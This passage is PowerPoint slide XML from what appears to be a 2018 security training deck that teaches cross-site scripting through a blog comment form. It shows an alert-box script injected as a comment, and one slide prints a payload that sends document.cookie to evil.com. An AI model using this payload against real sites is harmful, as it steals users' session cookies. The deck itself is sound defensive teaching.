      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1440" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1443" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6731103" y="1879509"/>
            <a:ext cx="10921794" cy="8682826"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10921792" cy="8682824"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1441" name="frame.png" descr="frame.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10921793" cy="8682825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1442" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="430139" y="1553973"/>
              <a:ext cx="10061515" cy="676481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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Blog Post"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665376" y="3495049"/>
            <a:ext cx="2959920" cy="113005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400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Blog Post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386000" y="5846133"/>
            <a:ext cx="9612002" cy="4033422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="E7EBEF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1446" name="Comment:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7233855" y="5163658"/>
            <a:ext cx="1755698" cy="67722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200">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Comment:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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0"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45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452" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1453" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1456" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6731103" y="1879509"/>
            <a:ext cx="10921794" cy="8682826"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10921792" cy="8682824"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1454" name="frame.png" descr="frame.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10921793" cy="8682825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1455" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="430139" y="1553973"/>
              <a:ext cx="10061515" cy="676481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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457" name="Blog Post"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665376" y="3495049"/>
            <a:ext cx="2959920" cy="113005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400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Blog Post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386000" y="5846133"/>
            <a:ext cx="9612002" cy="4033422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="E7EBEF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Comment:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7233855" y="5163658"/>
            <a:ext cx="1755698" cy="67722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200">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Comment:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1460" name="Love the post!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454186" y="5981938"/>
            <a:ext cx="7294737" cy="1489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914400">
              <a:defRPr sz="4400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Love the post!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="4400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;script&gt;alert('hello');&lt;/script&gt;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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14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60" grpId="1"/>
    </p:bldLst>
  </p:timing>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64"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465"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466" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1470" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6731103" y="1879509"/>
            <a:ext cx="10921794" cy="8682826"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10921792" cy="8682824"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1468" name="frame.png" descr="frame.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10921793" cy="8682825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="430139" y="1553973"/>
              <a:ext cx="10061515" cy="676481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solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471" name="Blog Post"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665376" y="3495049"/>
            <a:ext cx="2959920" cy="113005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400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Blog Post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1472" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386000" y="6864118"/>
            <a:ext cx="9612002" cy="3660197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="E7EBEF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1473" name="Comment:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7233855" y="6181643"/>
            <a:ext cx="1755698" cy="67722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200">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Comment:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1474" name="hello_js.png" descr="hello_js.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="15671"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154701" y="4955976"/>
            <a:ext cx="10287001" cy="5466954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475" name="Rich says: Love the post!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7304616" y="5026881"/>
            <a:ext cx="4267201" cy="57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2800">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Rich says:</a:t>
            </a:r>
            <a:r>
              <a:t> Love the post!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1476" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7111579" y="10516626"/>
            <a:ext cx="10337526" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="E7EBEF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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80" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-37570" y="-856035"/>
            <a:ext cx="24459140" cy="16240870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1481"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1482"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483" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1484" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1485" name="It’s kind of dangerous."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="457200"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>It’s kind of dangerous.</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89"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490"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491" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1492" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1493" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-27120" y="763488"/>
            <a:ext cx="24438240" cy="3932485"/>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1494" name="document.write(…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391107" y="1083492"/>
            <a:ext cx="15601787" cy="3292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5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>document.write(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'&lt;img src="</a:t>
            </a:r>
            <a:r>
              <a:t>https://evil.com?cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:hueOff val="-2473792"/>
                  <a:satOff val="-50209"/>
                  <a:lumOff val="23543"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'" /&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1495" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10825304" y="3327469"/>
            <a:ext cx="10441484" cy="10397977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1496" name="JAVASCRIPT"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="11786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JAVASCRIPT</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0" name="clean-hands-small.jpg" descr="clean-hands-small.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-41145" y="-79225"/>
            <a:ext cx="24466290" cy="16312850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1501" name="Don’t rely on sanitized inputs."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Don’t rely on sanitized inputs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1502" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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150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504" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
